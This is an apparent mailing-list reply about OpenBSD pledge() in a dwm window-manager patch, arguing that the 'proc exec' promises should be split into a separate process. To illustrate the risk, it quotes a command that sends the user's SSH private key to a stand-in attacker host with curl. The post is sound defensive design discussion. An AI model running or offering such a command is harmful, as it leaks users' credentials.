On Mon, 06 Jun 2016, Martin Kühne <mysat...@gmail.com> wrote: > Can it somehow be made to keep its effect across the exec family of syscalls? > > cheers! > mar77i
No. This is why pledging "stdio proc exec" is still quite dangerous. A well-designed program may try separating this functionality into a separate utility, or at least a different process. For example, the latest version of my dwm patch uses "stdio rpath proc exec", which means, if e.g. there was a bug in window title handling, a potential attacker could exploit it to run sth like "curl -d @.ssh/id_rsa http://evil.com/" or whatever else he needs to steal your laundry. Theoretically, such a bug could be exploited just by loading a web page or SSHing to a remote server - even if the web browser, the terminal emulator, the SSH client, were otherwise all secure. But the only reason dwm needs proc and exec, is so that it can spawn st, dmenu, etc on a keypress. This functionality could be handled by a separate tool or a subprocess, that doesn't need to process window titles. In such case, main dwm process could pledge to only use "stdio rpath". Hope this clarifies everything! <3,K.